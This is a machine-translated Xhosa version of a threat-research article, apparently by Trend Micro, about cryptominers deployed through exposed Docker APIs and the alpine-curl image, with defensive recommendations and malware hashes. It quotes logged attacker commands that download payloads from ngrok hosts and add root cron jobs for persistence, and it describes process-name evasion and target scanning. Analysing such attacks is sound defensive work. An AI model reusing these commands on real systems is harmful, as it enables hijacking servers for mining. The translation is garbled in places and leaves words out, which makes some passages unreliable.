Sihlalutye idatha eqokelelwe kusetyenziswa izitya ze-honeypot, esizenzileyo ukulandelela izoyikiso. Kwaye sibhaqe umsebenzi obalulekileyo ovela kubasebenzi basezimayini abangafunwayo okanye abangagunyaziswanga be-cryptocurrency bebekwe njengezikhongozeli ezikhohlakeleyo zisebenzisa umfanekiso opapashwe kuluntu kwi-Docker Hub. Umfanekiso usetyenziswa njengenxalenye yenkonzo ehambisa abasebenzi basezimayini abakhohlakeleyo be-cryptocurrency.
Ukongeza, iinkqubo zokusebenza kunye nothungelwano zifakelwe ukungena kwizikhongozeli ezivulekileyo ezingabamelwane kunye nezicelo.
Sishiya iipothi zethu zobusi njengoko zinjalo, oko kukuthi, ngokusetwa okungagqibekanga, ngaphandle kwamanyathelo okhuseleko okanye ukufakwa okulandelayo kwesoftware eyongezelelweyo. Nceda uqaphele ukuba iDocker ineengcebiso zokuseta okokuqala ukunqanda iimpazamo kunye nokuba semngciphekweni okulula. Kodwa iimbiza zobusi ezisetyenzisiweyo zizikhongozeli, ezenzelwe ukukhangela uhlaselo olujolise kwiqonga leekhonteyina, hayi usetyenziso olungaphakathi kwizikhongozeli.
Umsebenzi ongalunganga ofunyenweyo uyaphawuleka kuba awufuni ukuba semngciphekweni kwaye uzimele kuhlobo lweDocker. Ukufumana uqwalaselo olungachanekanga, kwaye ke ngoko luvulekileyo, umfanekiso wesikhongozeli yiyo yonke into abahlaseli abayidingayo ukosulela iiseva ezininzi ezivulekileyo.
I-Docker API engavaliwe ivumela umsebenzisi ukuba enze uluhlu olubanzi lwe , kubandakanywa ukufumana uluhlu lwezikhongozeli eziqhubayo, ukufumana iilogs kwisikhongozeli esithile, ukuqala, ukumisa (kuquka ukunyanzeliswa) kunye nokudala isitsha esitsha kumfanekiso othile kunye nezicwangciso ezichaziweyo.
Ekhohlo yindlela yokuhanjiswa kwe-malware. Ngasekunene yindawo engqongileyo yomhlaseli, evumela ukuqengqeleka kude kwemifanekiso.
Ukusasazwa kwilizwe le-3762 evulekileyo ye-Docker APIs. Ngokusekwe kukhangelo lweShodan lomhla we-12.02.2019/XNUMX/XNUMX
Uhlaselo lwekhonkco kunye nokhetho lomthwalo wokuhlawula
Umsebenzi okhohlakeleyo awubonwanga kuphela ngoncedo lwee-honeypots. Idatha esuka kwi-Shodan ibonisa ukuba inani le-APIs ye-Docker eveziweyo (jonga igrafu yesibini) iye yanda ukususela ekubeni siphanda isitya esingafanelekanga esisetyenziswe njengebhulorho yokubeka isoftware ye-Monero cryptocurrency mining. Ngo-Oktobha kunyaka ophelileyo (2018, idatha yangoku malunga. umguquleli) kwakukho kuphela i-856 evulekileyo ye-APIs.
Uphononongo lwezigodo zembiza yobusi lubonise ukuba ukusetyenziswa komfanekiso wesikhongozeli nako kwayanyaniswa nokusetyenziswa kwe , isixhobo sokuseka uqhagamshelo olukhuselekileyo okanye uthungelwano lwetrafikhi ukusuka kwiindawo ezifikelelekayo esidlangalaleni ukuya kwiidilesi ezichaziweyo okanye izixhobo (umzekelo ihostela yendawo). Oku kuvumela abahlaseli ukuba benze ii-URL ngokukhawuleza xa behambisa umvuzo kwiseva evulekileyo. Apha ngezantsi yimizekelo yekhowudi esuka kwiilog ezibonisa ukusetyenziswa kakubi kwenkonzo ye-ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Njengoko ubona, iifayile ezilayishiwe zikhutshelwa kwii-URL ezitshintsha rhoqo. Ezi URLs zinomhla omfutshane wokuphelelwa, ngoko ke umthwalo awukwazi ukukhutshelwa emva kokuphelelwa kwexesha.
Kukho iindlela ezimbini zokukhetha umvuzo. Eyokuqala yi-ELF i-miner ehlanganisiweyo ye-Linux (echazwa njenge-Coinminer.SH.MALXMR.ATNO) edibanisa kwi-pool yezimayini. Okwesibini siscript (TrojanSpy.SH.ZNETMAP.A) eyilelwe ukufumana izixhobo ezithile zenethiwekhi ezisetyenziselwa ukuskena uluhlu lwenethiwekhi emva koko ukukhangela iithagethi ezintsha.
Iskripthi se-dropper siseta izinto ezimbini eziguquguqukayo, ezithi ke zisetyenziswe ukuhambisa i-cryptocurrency miner. I-variable ye-HOST iqulethe i-URL apho iifayile ezinobungozi zikhoyo, kwaye i-RIP eguquguqukayo ligama lefayile (enyanisweni, i-hash) yomgcini-mgodi oza kuthunyelwa. Utshintsho lwe-HOST lutshintsha lonke ixesha utshintsho lwe-hash. Isikripthi sikwazama ukujonga ukuba akukho nanye abasebenzi basezimayini be-cryptocurrency abaqhuba kwiseva ehlaselweyo.
Imizekelo ye-HOST kunye ne-RIP eguquguqukayo, kunye nekhowudi yesnippet esetyenziselwa ukujonga ukuba akukho abanye abasebenzi basezimayini abasebenzayo.
Ngaphambi kokuba uqalise umsebenzi-mgodini, ubizwa ngokuba ngu-nginx. Ezinye iinguqulelo zolu shicilelo zithiya ngokutsha umsebenzi-mgodini kwezinye iinkonzo ezisemthethweni ezinokuthi zibekhona kwiimeko zeLinux. Oku kuqhele ukwanela ukugqitha iitshekhi ngokuchasene noluhlu lweenkqubo ezisebenzayo.
Iskripthi sokukhangela sikwanazo neempawu. Isebenza kunye nenkonzo ye-URL efanayo ukuhambisa izixhobo eziyimfuneko. Phakathi kwazo kukho i-zmap yokubini, esetyenziselwa ukuskena uthungelwano kwaye ufumane uluhlu lwamazibuko avulekileyo. Isikripthi siphinde silayishe enye ibhinari esetyenziselwa ukusebenzisana neenkonzo ezifunyenweyo kunye nokufumana amabhanari avela kubo ukucacisa ulwazi olongezelelweyo malunga nenkonzo efunyenweyo (umzekelo, inguqulo yayo).
Iskripthi sikwamisela kwangaphambili ezinye izintlu zenethiwekhi ukuze ziskenwe, kodwa oku kuxhomekeke kuguqulelo lweskripthi. Ikwaseta amachweba ekujoliswe kuwo kwiinkonzo-kule meko, iDocker-ngaphambi kokuqhuba iskena.
Ngokukhawuleza ukuba iithagethi ezinokwenzeka zifunyenwe, amabhanari asuswa ngokuzenzekelayo kuwo. Iskripthi siphinda sihluze iithagethi ngokuxhomekeke kwiinkonzo, izicelo, amacandelo okanye amaqonga anomdla: Redis, Jenkins, Drupal, MODX, , Docker 1.16 umxhasi kunye ne-Apache CouchDB. Ukuba iseva eskeniweyo ihambelana nayo nayiphi na kuzo, igcinwa kwifayile ebhaliweyo, apho abahlaseli banokuyisebenzisa kamva kuhlalutyo olulandelayo kunye nokugqekeza. Ezi fayile ezibhaliweyo zilayishwe kwiiseva zabahlaseli ngokusebenzisa amakhonkco aguqukayo. Oko kukuthi, i-URL eyahlukileyo isetyenziselwa ifayile nganye, oko kuthetha ukuba ukufikelela okulandelayo kunzima.
Ivector yohlaselo ngumfanekiso weDocker, njengoko unokubonwa kwiziqwenga ezimbini ezilandelayo zekhowudi.
Phezulu kukuqamba ngokutsha kwinkonzo esemthethweni, kwaye ezantsi yindlela i-zmap esetyenziswa ngayo ukuskena uthungelwano.
Phezulu kukho uluhlu lwenethiwekhi oluchazwe kwangaphambili, ezantsi kukho amazibuko athile okukhangela iinkonzo, kubandakanya iDocker
Umfanekiso weskrini ubonisa ukuba umfanekiso we-alpine-curl ukhutshelwe ngaphezu kwezigidi ezili-10
Ngokusekwe kwiAlpine Linux kunye ne-curl, isixhobo esisebenzayo se-CLI sokuhambisa iifayile kwiiprotocol ezahlukeneyo, unokwakha . Njengoko ubona kumfanekiso odlulileyo, lo mfanekiso sele ukhutshelwe ngaphezu kwezigidi ezili-10 amaxesha. Inani elikhulu lokukhutshelwa linokuthetha ukusebenzisa lo mfanekiso njengendawo yokungena; lo mfanekiso uhlaziywe ngaphezu kweenyanga ezintandathu ezidlulileyo; abasebenzisi abazange bakhuphele eminye imifanekiso kulo vimba rhoqo. KwiDocker - iseti yemiyalelo esetyenziselwa ukuqwalasela isikhongozeli ukuze siqhube. Ukuba iisetingi zendawo yokungena azichanekanga (umzekelo, isikhongozeli sishiywe sivuliwe kwi-Intanethi), umfanekiso ungasetyenziswa njengesixhobo sohlaselo. Abahlaseli banokuyisebenzisa ukuhambisa umthwalo ukuba bafumana isikhongozeli esingafanelekanga okanye esivulekileyo esishiywe singaxhaswanga.
Kubalulekile ukuba uqaphele ukuba lo mfanekiso (i-alpine-curl) ngokwayo ayibi, kodwa njengoko ubona ngasentla, ingasetyenziselwa ukwenza imisebenzi engalunganga. Imifanekiso yeDocker efanayo inokusetyenziselwa ukwenza imisebenzi engalunganga. Siqhagamshelene noDocker kwaye sasebenza nabo kulo mbandela.
Iingcebiso
ihlala kwiinkampani ezininzi, ngakumbi ezo zizalisekisayo , igxile kuphuhliso olukhawulezayo kunye nonikezelo. Yonke into yenziwa mandundu yimfuneko yokuthobela imithetho yophicotho-zincwadi nokubeka iliso, imfuneko yokubeka esweni ukugcinwa kwemfihlo kwedatha, kwakunye nomonakalo omkhulu wokungathotyelwa kwawo. Ukubandakanya ukhuseleko oluzenzekelayo kumjikelo wobomi wophuhliso akuncedi kuphela ukuba ufumane imingxunya yokhuseleko enokuthi ingabonakali, kodwa ikwanceda ekunciphiseni umthwalo ongeyomfuneko, njengokusebenzisa isoftware eyongezelelweyo eyakhayo kubuthathaka obufunyenweyo okanye ukungalungiswa kakuhle emva kokuba isicelo sibekiwe.
Isiganeko ekuxutyushwa ngaso kweli nqaku sibalaselisa imfuneko yokunikela ingqalelo kukhuseleko kwasekuqaleni, kuquka la macebiso alandelayo:
- Kubalawuli benkqubo kunye nabaphuhlisi: Soloko ujonga iisetingi zakho zeAPI ukuze uqiniseke ukuba yonke into iqwalaselwe ukuba yamkele izicelo ezisuka kumncedisi othile okanye inethiwekhi yangaphakathi.
- Landela umgaqo wamalungelo amancinci: qinisekisa ukuba imifanekiso yesikhongozeli isayinwe kwaye iqinisekisiwe, ukunciphisa ukufikelela kumacandelo abalulekileyo (inkonzo yokuqalisa isikhongozeli) kwaye ungeze uguqulelo oluntsonkothileyo kunxibelelwano lwenethiwekhi.
- Landela kunye nokwenza iindlela zokhuseleko, umz. kwaye yakhelwe ngaphakathi .
- Sebenzisa ukuskena okuzenzekelayo kwamaxesha okusebenza kunye nemifanekiso ukufumana ulwazi olongezelelweyo malunga neenkqubo ezisebenza kwisikhongozeli (umzekelo, ukufumanisa i-spoofing okanye ukukhangela ubuthathaka). Ulawulo lwesicelo kunye nokubeka iliso kwintembeko kunceda ukulandelela utshintsho olungaqhelekanga kwiiseva, iifayile, kunye neendawo zenkqubo.
I-Trendmicro inceda amaqela e-DevOps ukuba akhe ngokukhuselekileyo, akhuphe ngokukhawuleza, kwaye aqalise naphi na. Trend Micro Ibonelela ngokhuseleko olunamandla, olulungelelanisiweyo, kunye noluzenzekelayo kuwo wonke umbhobho we-DevOps wombutho kwaye ibonelela ngokhuseleko oluninzi ukukhusela imithwalo ebonakalayo, ebonakalayo kunye nelifu ngexesha lokusebenza. Yongeza kwakhona ukhuseleko lwesikhongozeli nge и , eskena imifanekiso yesikhongozeli se-Docker ye-malware kunye nobuthathaka nakweyiphi na indawo kumbhobho wophuhliso ukukhusela izoyikiso ngaphambi kokuba zisiwe.
Iimpawu zokulalanisa
Iiheshi ezinxulumeneyo:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
phezu Izithethi eziziqhelanisayo zibonisa ukuba loluphi useto ekufuneka lwenziwe kuqala ukuze kuncitshiswe ukuba nokwenzeka okanye ukuphepha ngokupheleleyo ukwenzeka kwale meko ichazwe ngasentla. Kwaye ngo-Agasti 19-21 kwindawo enzulu ye-intanethi Unokuxoxa ngezi kunye neengxaki zokhuseleko ezifanayo kunye noogxa kunye nabafundisi abaziqhelisayo kwitafile ejikelezayo, apho wonke umntu anokuthetha kwaye aphulaphule iintlungu kunye nempumelelo yabalingane abanamava.
umthombo: www.habr.com